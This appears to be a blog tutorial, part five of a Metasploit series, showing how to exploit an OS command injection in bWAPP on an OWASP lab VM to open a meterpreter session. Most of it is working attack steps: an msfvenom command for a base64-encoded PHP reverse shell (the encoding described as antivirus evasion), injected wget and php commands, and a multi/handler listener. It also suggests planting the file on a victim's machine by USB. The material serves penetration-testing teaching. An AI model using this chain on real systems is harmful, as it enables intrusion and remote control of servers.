Complete Metasploit Guide (Part-5 OS Command Injection)

 Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack.

 I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as a code. 

So let us, first of all, go to the OWASP virtual machine. So my Ip is 192.168.56.11 It will open up our standard OWASP virtual machine welcome page, where we have all of our stuff that we need. we want to go to the bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to log in.  Press enter, and you are logged into BWAPP. then choose os command injection

So we will use burpsuite as well with the mixture of Metasploit, and with the mixture of the OWASP virtual machine. So we will be able to inspect packets in burp suite, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands.  

So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reloaded once again, we successfully connect to it. And here what we  chose is the OS command injection. 

And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see a server and then this IP address, so this basically the router, and then we have some of the other options as well. So the IP address at the end is this one, it doesn't even matter. So what matters for us is what happens if we run that. And then after that, we also specify ls, which is the command to list all of the directories and files in that sub directory. So we click here ls, and just as simple as that we can now see that this website is vulnerable to the command injection. 

It also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. 
Now, why over PHP? 
As we can see right here all these files are in .PHP, and we can actually upload the shell on this web server, and run it, make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. 

So this is where we introduce, for the first time, the msfvenom tool, which we will use in order to create the meterpreter shell. So we need to leave this and let's open a new terminal. 

msfvenom

 and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it.

#msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

 So msfvenom... now -p option will actually after that specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp. 

 I made a simple illustration of what our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good old Kali Linux machine that's for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, 

So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks nowadays have firewalls, but what firewall cannot prevent is the victim machine connecting back to us. 

Now how will we do that? 

What we want to do is we want to send the file to this machine right here. The file, so shell.php is that file and we sent it to the victim machine, and what that file would do is basically it will initiate the connection with us. 
So this file when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. 

But you might be asking, how are we going to get that file on the victim machine? 

Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. 

But if, for example, the machine isn't vulnerable to anything, which we will cover in the later articles when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer to the victim machine while they are not looking, or something like that, and then run the file. And basically, you just did all of this process by yourself, just being physically on their laptop or on their PC. 

So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell. 

So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. 

Now after you specify all of this, the next thing we want to specify is the localhost IP address. Now, what is the localhost IP address? That is the IP address of the host that's listening. Which in this case the host that is listening is you. So you as an attacker are the listening host. So, what we need to specify right here after the LHOST, then equals and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... And then we specify 10.0.2.15 

And after that, we need to specify the out port as well, and that is the port that you are listening to. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that, you can select some of the other options that are actually optional. 

So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder...I covered what an encoder is in the previous article. So basically it's used to most likely bypass antiviruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. 

What else we want to specify at the end is -f, and then file to be raw, and after that, we want to specify this narrow and just save that into shell.php Once we select all of this and once we double-check all of the options that we set, you can click click here enter, and this will take a few seconds to finish. 

So, our meterpreter PHP shell is now 1503 bytes large. If you press here ls, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is our program that we will be send to the victim machine. We created it with this command. Now there are a few things that you need to do when you make the PHP reverse shell. 

First of all, you need to add the PHP tag. since it doesn't come with that. So, this is the scrambled code. This is basically Base64 encoded code as we can see right here. This is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. So, first of all, up here we want to add this tag, and then a question mark, and then PHP. So that is the opening tag, and at the end, we want to add the question mark and then the closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So, ctrl + O to save, Ctrl + X to exit. 

And now we are good to go. The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the XAMPP Apache 2 web server. So you want to send this to your XAMPP webserver. So let us go to /opt/lampp/htdocs/, which is the location of all the programs that are available on your XAMPP web server, basically whatever path to your shell.php is, and move it to /opt/lampp/htdocs/I made one folder named shell so mine directory is /opt/lampp/htdocs/shell. And we can see that right now we have this shell.php right here. 

 now the next thing we want to do is make sure that XAMPP is running. We can see that is active and running. And right now what we want to do is go to our IP address, which is localhost/shell, 

and we can see that right here we have available online the shell.php file. Now what we want to do, we want to make that the victim PC actually downloads this file. So how do we do that? Since it is vulnerable to the command injection,  you want to do is use a simple tool that is on all Linux systems, which is called wget. Now, wget is basically used to download the file.  And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command wget, and then we run localhost and we need to specify what we are downloading. So we need to specify the /shell.php since that is the name of our file that is located in the www/html folder.

Which looks like this,

 

wget  localhost/shell/shell.php

 

 

We press here enter and this will download the file for us. As we can see it downloaded shell.php just with this simple one command. So if I type here ls once again, we can see that the shell.php is in our folder.  So now if we cat it we can see that we get the entire file right here. 

Now, this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack. So right now what we want to do is perform the command injection. 

 

So we know that there is a vulnerable input, and let's actually exploit it right now.

And let us right now type the same command. So

 

;wget localhost/shell/shell.php 

 

Now try to find if right now it successfully downloaded the shell.php So it should be somewhere around, we successfully got the shell.php file on our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine. Now in order for you to execute this file you will need to type a certain command. But before we type that command, we need to start listening on a certain port. 

 

So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. 

 

So this is something that you will use a lot. Just type here

 use exploit/multi/handler

 

 

If you show options, you can see that there are no options right here. So what you want to do is set the payload, 

set payload php/meterpreter/reverse_tcp 

 

and we can see that we get the whole LHOST to listen on. Now double-check the port we specified in that command while we were making shell.php that the LPORT is 4444, and the LHOST is the IP address of our own machine. So we listen to our own connection. So 

set LHOST 10.0.2.15 

 

 

 

And all I need to do is type here exploit right now, and this will wait for an incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type, and then what we want to do is basically php -f and then shell.php. This command right here will run the PHP file. 

 

;php -f shell.php

 

And we can see if I press here Lookup, we get a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual machine, or basically, this is a connection from our OWASP virtual machine, which it's IP address, and the IP address of this is our Kali Linux machine. So we successfully got meterpreter open. Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open. So what can we execute, what post-exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial and take care. 

Check Out the Metasploit Series

Part 1 - Introduction and Preparation of Metasploit Payloads

Part 2 - Understanding All Metasploit Modules

Part 3 - Brute Forcing SSH with Auxiliary

Part 4 - Brute Forcing Tomcat With MSF Auxiliary

Other Cool Hacking Stuff

You may like these posts